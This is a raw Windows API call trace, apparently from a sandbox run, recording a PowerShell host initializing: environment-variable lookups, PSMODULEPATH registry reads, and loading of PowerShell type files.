	[0326.439] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0326.439] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0326.439] CoTaskMemFree (pv=0x1f7c30) 
	[0326.440] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0326.440] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0326.440] CoTaskMemFree (pv=0x1f7c30) 
	[0326.441] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0326.441] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0326.441] CoTaskMemFree (pv=0x1f7c30) 
	[0326.444] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0326.444] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0326.444] CoTaskMemFree (pv=0x1f7c30) 
	[0326.445] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0326.445] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0326.445] CoTaskMemFree (pv=0x1f7c30) 
	[0326.446] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0326.446] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0326.446] CoTaskMemFree (pv=0x1f7c30) 
	[0327.265] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0327.265] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0327.265] CoTaskMemFree (pv=0x1f7c30) 
	[0327.270] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0327.270] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0327.270] CoTaskMemFree (pv=0x1f7c30) 
	[0327.271] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0327.271] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0327.271] CoTaskMemFree (pv=0x1f7c30) 
	[0327.271] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0327.271] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0327.271] CoTaskMemFree (pv=0x1f7c30) 
	[0328.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0328.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0328.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0328.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.684] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14d060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0330.689] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0330.689] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0330.689] CoTaskMemFree (pv=0x1f7c30) 
	[0330.691] CoTaskMemAlloc (cb=0xcc) returned 0x1b72f6d0
	[0330.691] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b72f6d0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0330.691] CoTaskMemFree (pv=0x1b72f6d0) 
	[0330.691] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d788 | out: phkResult=0x14d788*=0x324) returned 0x0
	[0330.691] RegQueryValueExW (in: hKey=0x324, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x14d70c, lpData=0x0, lpcbData=0x14d708*=0x0 | out: lpType=0x14d70c*=0x2, lpData=0x0, lpcbData=0x14d708*=0x6c) returned 0x0
	[0330.691] CoTaskMemAlloc (cb=0x70) returned 0x24a9c0
	[0330.691] RegQueryValueExW (in: hKey=0x324, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x14d6dc, lpData=0x24a9c0, lpcbData=0x14d6d8*=0x6c | out: lpType=0x14d6dc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x14d6d8*=0x6c) returned 0x0
	[0330.691] CoTaskMemFree (pv=0x24a9c0) 
	[0330.691] CoTaskMemAlloc (cb=0xcc) returned 0x1b72f6d0
	[0330.691] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b72f6d0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0330.691] CoTaskMemFree (pv=0x1b72f6d0) 
	[0330.691] CoTaskMemAlloc (cb=0xcc) returned 0x1b72f6d0
	[0330.691] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b72f6d0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0330.692] CoTaskMemFree (pv=0x1b72f6d0) 
	[0330.694] RegCloseKey (hKey=0x324) returned 0x0
	[0330.694] CoTaskMemAlloc (cb=0xcc) returned 0x1b72f6d0
	[0330.694] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b72f6d0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0330.695] CoTaskMemFree (pv=0x1b72f6d0) 
	[0330.695] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d788 | out: phkResult=0x14d788*=0x324) returned 0x0
	[0330.695] RegQueryValueExW (in: hKey=0x324, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x14d70c, lpData=0x0, lpcbData=0x14d708*=0x0 | out: lpType=0x14d70c*=0x0, lpData=0x0, lpcbData=0x14d708*=0x0) returned 0x2
	[0330.695] RegCloseKey (hKey=0x324) returned 0x0
	[0330.698] CoTaskMemAlloc (cb=0x20c) returned 0x28ec40
	[0330.699] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x28ec40 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0330.701] CoTaskMemFree (pv=0x28ec40) 
	[0330.701] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x14d310, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0330.705] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0331.238] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0331.238] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0331.238] CoTaskMemFree (pv=0x1f7c30) 
	[0331.240] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0331.240] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0331.240] CoTaskMemFree (pv=0x1f7c30) 
	[0331.243] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0331.243] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0331.243] CoTaskMemFree (pv=0x1f7c30) 
	[0331.243] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0331.243] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0331.243] CoTaskMemFree (pv=0x1f7c30) 
	[0331.245] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d578 | out: phkResult=0x14d578*=0x32c) returned 0x0
	[0331.246] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x14d58c, lpData=0x0, lpcbData=0x14d588*=0x0 | out: lpType=0x14d58c*=0x1, lpData=0x0, lpcbData=0x14d588*=0x74) returned 0x0
	[0331.247] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x14d4fc, lpData=0x0, lpcbData=0x14d4f8*=0x0 | out: lpType=0x14d4fc*=0x1, lpData=0x0, lpcbData=0x14d4f8*=0x74) returned 0x0
	[0331.247] CoTaskMemAlloc (cb=0x78) returned 0x24a9c0
	[0331.247] RegQueryValueExW (in: hKey=0x32c, lpValueName="path", lpReserved=0x0, lpType=0x14d4cc, lpData=0x24a9c0, lpcbData=0x14d4c8*=0x74 | out: lpType=0x14d4cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x14d4c8*=0x74) returned 0x0
	[0331.247] CoTaskMemFree (pv=0x24a9c0) 
	[0331.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x14d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0331.248] SetErrorMode (uMode=0x1) returned 0x1
	[0331.248] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x14d450 | out: lpFileInformation=0x14d450*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0331.248] SetErrorMode (uMode=0x1) returned 0x1
	[0331.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0331.249] SetErrorMode (uMode=0x1) returned 0x1
	[0331.249] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d450 | out: lpFileInformation=0x14d450*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0331.249] SetErrorMode (uMode=0x1) returned 0x1
	[0331.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14d240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0331.251] SetErrorMode (uMode=0x1) returned 0x1
	[0331.251] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d450 | out: lpFileInformation=0x14d450*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0331.252] SetErrorMode (uMode=0x1) returned 0x1
	[0331.252] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0331.252] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0331.252] CoTaskMemFree (pv=0x1f7c30) 
	[0331.254] CoTaskMemAlloc (cb=0x104) returned 0x1f7c30
	[0331.254] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7c30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0331.254] CoTaskMemFree (pv=0x1f7c30) 
	[0331.255] GetACP () returned 0x4e4
	[0331.267] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0331.267] SetErrorMode (uMode=0x1) returned 0x1
	[0331.268] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0331.268] GetFileType (hFile=0x330) returned 0x1
	[0331.268] SetErrorMode (uMode=0x1) returned 0x1
	[0331.268] GetFileType (hFile=0x330) returned 0x1
	[0332.065] ReadFile (in: hFile=0x330, lpBuffer=0x2dc4f48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2dc4f48*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.067] ReadFile (in: hFile=0x330, lpBuffer=0x2dc4f48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2dc4f48*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.068] ReadFile (in: hFile=0x330, lpBuffer=0x2dc4f48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2dc4f48*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.068] ReadFile (in: hFile=0x330, lpBuffer=0x2dc4f48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2dc4f48*, lpNumberOfBytesRead=0x14d388*=0xcf3, lpOverlapped=0x0) returned 1
	[0332.068] ReadFile (in: hFile=0x330, lpBuffer=0x2dc43a3, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2dc43a3*, lpNumberOfBytesRead=0x14d388*=0x0, lpOverlapped=0x0) returned 1
	[0332.068] ReadFile (in: hFile=0x330, lpBuffer=0x2dc4f48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2dc4f48*, lpNumberOfBytesRead=0x14d388*=0x0, lpOverlapped=0x0) returned 1
	[0332.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0332.071] SetErrorMode (uMode=0x1) returned 0x1
	[0332.071] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d300 | out: lpFileInformation=0x14d300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0332.071] SetErrorMode (uMode=0x1) returned 0x1
	[0332.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0332.072] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3e8 | out: phkResult=0x14d3e8*=0x330) returned 0x0
	[0332.072] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d36c, lpData=0x0, lpcbData=0x14d368*=0x0 | out: lpType=0x14d36c*=0x1, lpData=0x0, lpcbData=0x14d368*=0x56) returned 0x0
	[0332.072] CoTaskMemAlloc (cb=0x5a) returned 0x1b724890
	[0332.072] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d33c, lpData=0x1b724890, lpcbData=0x14d338*=0x56 | out: lpType=0x14d33c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d338*=0x56) returned 0x0
	[0332.073] CoTaskMemFree (pv=0x1b724890) 
	[0332.073] RegCloseKey (hKey=0x330) returned 0x0
	[0332.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14d030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0332.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x14cee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0332.104] GetSystemInfo (in: lpSystemInfo=0x14c020 | out: lpSystemInfo=0x14c020*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0332.105] VirtualQuery (in: lpAddress=0x14c0d0, lpBuffer=0x14cf90, dwLength=0x30 | out: lpBuffer=0x14cf90*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0332.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x14ce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0332.977] SetErrorMode (uMode=0x1) returned 0x1
	[0332.977] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x330
	[0332.977] GetFileType (hFile=0x330) returned 0x1
	[0332.977] SetErrorMode (uMode=0x1) returned 0x1
	[0332.977] GetFileType (hFile=0x330) returned 0x1
	[0332.977] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.978] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
	[0332.978] ReadFile (in: hFile=0x330, lpBuffer=0x2cc07b8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d388, lpOverlapped=0x0 | out: lpBuffer=0x2cc07b8*, lpNumberOfBytesRead=0x14d388*=0x1000, lpOverlapped=0x0) returned 1
